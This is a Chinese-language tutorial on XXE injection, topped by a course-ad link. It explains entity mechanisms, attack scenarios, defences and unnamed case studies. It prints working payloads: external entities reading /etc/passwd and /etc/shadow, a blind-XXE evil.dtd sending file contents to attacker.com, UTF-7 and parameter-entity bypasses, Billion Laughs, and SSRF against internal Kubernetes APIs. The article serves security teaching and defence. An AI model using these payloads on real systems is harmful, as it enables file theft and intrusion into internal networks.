获课：789it.top/14912/

XML外部实体注入（XXE）是Web应用中一种高危漏洞类型，攻击者通过构造恶意XML文档，利用解析器对外部实体的支持特性，可实现敏感文件读取、内网探测、远程代码执行等攻击。本文从漏洞原理、攻击场景、防御机制三个维度，结合真实案例与攻防技巧，系统解析XXE漏洞的利用与防御。

一、XXE漏洞的核心原理

1.1 XML实体机制的双刃剑

XML支持通过实体（Entity）引用外部资源，包括：

• 内部实体：直接定义在文档中的静态内容（如<!ENTITY name "John">）
• 外部实体：通过URI引用外部资源（如<!ENTITY file SYSTEM "file:///etc/passwd">）
• 参数实体：仅在DTD内部使用的特殊实体（以%开头，如<!ENTITY % param SYSTEM "http://attacker.com/evil.dtd">）

当解析器未禁用外部实体加载时，攻击者可构造包含恶意URI的XML文档，诱导服务器加载任意文件或发起网络请求。例如，某金融系统因未过滤用户上传的SVG文件，导致攻击者通过<!ENTITY xxe SYSTEM "file:///etc/shadow">读取系统密码文件。

1.2 协议支持的多样性

不同语言环境支持的协议存在差异，攻击者可利用此特性绕过过滤：

• PHP环境：支持file://、http://、php://filter（用于编码转换）、expect://（需安装expect扩展，可执行系统命令）
• Java环境：支持jar:（读取ZIP压缩包内文件）、netdoc:（高版本JDK已禁用）
• 通用协议：ftp://、gopher://（部分版本受限）

某电商平台的订单导出功能曾因使用Java的DocumentBuilderFactory未禁用DTD，被攻击者通过jar:file:///app/logs/order.zip!/config.xml读取压缩包内的配置文件。

二、XXE攻击的典型场景

2.1 有回显场景：直接读取敏感数据

当服务器返回解析后的XML内容时，攻击者可直接获取文件内容。例如：

1. 文件读取：通过file://协议读取/etc/passwd、数据库配置文件等
2. 内网探测：利用http://192.168.1.1/admin探测内网服务，结合响应时间判断端口状态
3. SSRF攻击：通过http://internal-api/sensitive访问内部API

某OA系统因使用Python的lxml解析用户上传的XML文件，未设置resolve_entities=False，导致攻击者读取到数据库连接字符串，进而通过SQL注入获取全量数据。

2.2 无回显场景（Blind XXE）：外带数据通道

当服务器不返回解析结果时，攻击者可利用以下技术外带数据：

• DNS外带：通过<!ENTITY xxe SYSTEM "http://attacker.com/?data=file:///etc/hostname">触发DNS查询，记录请求域名中的数据
• HTTP外带：构造嵌套DTD文件，将文件内容作为URL参数发送至攻击者服务器：

  xml1<!-- 攻击者服务器上的evil.dtd -->2<!ENTITY % file SYSTEM "file:///etc/passwd">3<!ENTITY % send SYSTEM "http://attacker.com/?data=%file;">4%send;

• FTP外带：利用Java环境对FTP协议的支持，将数据写入FTP服务器的日志文件

某政府网站因使用旧版JDK未禁用外部实体，被攻击者通过FTP外带技术读取到系统环境变量，发现内网存在未授权访问的Redis服务。

2.3 高级利用技巧

• UTF-7编码绕过：将XML声明改为<?xml version="1.0" encoding="UTF-7"?>，使用+ADw-代替<绕过关键词过滤
• 参数实体嵌套：通过多层参数实体引用绕过基础防护，例如：

  xml1<!ENTITY % param1 SYSTEM "file:///etc/passwd">2<!ENTITY % param2 "<!ENTITY % exploit SYSTEM '%param1;'>">3%param2;4%exploit;

• XInclude攻击：当XML输入被禁用DTD时，可通过<xi:include href="file:///etc/passwd"/>触发文件读取
• 资源耗尽攻击：利用“Billion Laughs”漏洞，通过递归实体扩展耗尽服务器内存：

  xml1<!ENTITY e1 "aaaa...">  <!-- 重复10次 -->2<!ENTITY e2 "&e1;&e1;...&e1;">  <!-- 指数级扩展 -->

三、XXE漏洞的防御策略

3.1 代码层防御

• 禁用外部实体解析：
  • PHP：libxml_disable_entity_loader(true)
  • Java：DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
  • Python：lxml.etree.XMLParser(resolve_entities=False)
• 输入验证与过滤：
  • 拒绝包含<!DOCTYPE、<!ENTITY的XML输入
  • 使用白名单限制允许的XML标签和属性
• 输出编码：对返回的XML内容进行HTML编码，防止XSS等二次攻击

3.2 架构层防御

• 网络隔离：将XML解析服务部署在内网，通过API网关统一处理外部请求
• 协议限制：禁用不必要的协议支持（如gopher://、file://）
• 最小权限原则：运行XML解析服务的账户应具备最少系统权限

3.3 检测与监控

• WAF规则：部署支持XXE检测的WAF，拦截包含可疑实体的请求
• 日志分析：监控XML解析相关的异常日志（如DTD加载失败、外部实体引用）
• 定期扫描：使用自动化工具（如Burp Suite、OWASP ZAP）定期检测XXE漏洞

四、真实案例分析

案例1：某银行核心系统XXE漏洞

漏洞成因：使用旧版Axis2框架处理SOAP请求，未禁用DTD解析。
攻击过程：

1. 攻击者构造恶意SOAP请求，包含外部实体引用：

   xml1<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///app/config/db.properties">]>2<soap:Body>&xxe;</soap:Body>

2. 服务器返回数据库连接字符串，攻击者通过SQL注入获取全量客户数据。
   修复方案：升级Axis2至最新版本，禁用DTD解析，并添加输入验证。

案例2：某云平台XXE导致内网渗透

漏洞成因：文件上传功能未过滤SVG文件中的XXE payload。
攻击过程：

1. 攻击者上传恶意SVG文件：

   xml1<svg xmlns="http://www.w3.org/2000/svg">2<!ENTITY xxe SYSTEM "http://internal-k8s-api:6443/api/v1/namespaces">3</svg>

2. 通过解析响应判断内网Kubernetes API暴露，进一步利用未授权访问获取云平台控制权。
   修复方案：禁用SVG文件中的XML实体解析，并通过网络隔离限制内网访问。

五、未来趋势与建议

随着云原生和微服务架构的普及，XXE攻击面正在向以下方向扩展：

1. 服务间通信：gRPC、GraphQL等新型协议可能引入新的XXE变种
2. 配置中心：Nacos、Apollo等配置管理工具若使用XML格式，需防范配置注入
3. AI模型训练：XML格式的数据集若未过滤，可能导致模型污染攻击

建议：

• 开发团队应将XXE防御纳入安全编码规范，定期进行安全培训
• 安全团队需关注新兴框架的XXE防护机制，及时更新检测规则
• 企业应建立XML处理的白名单制度，明确允许的解析场景和协议

XXE漏洞的防范需要从代码、架构、运维多个层面协同推进，通过“预防-检测-响应”的闭环管理，才能有效降低此类高危漏洞的利用风险。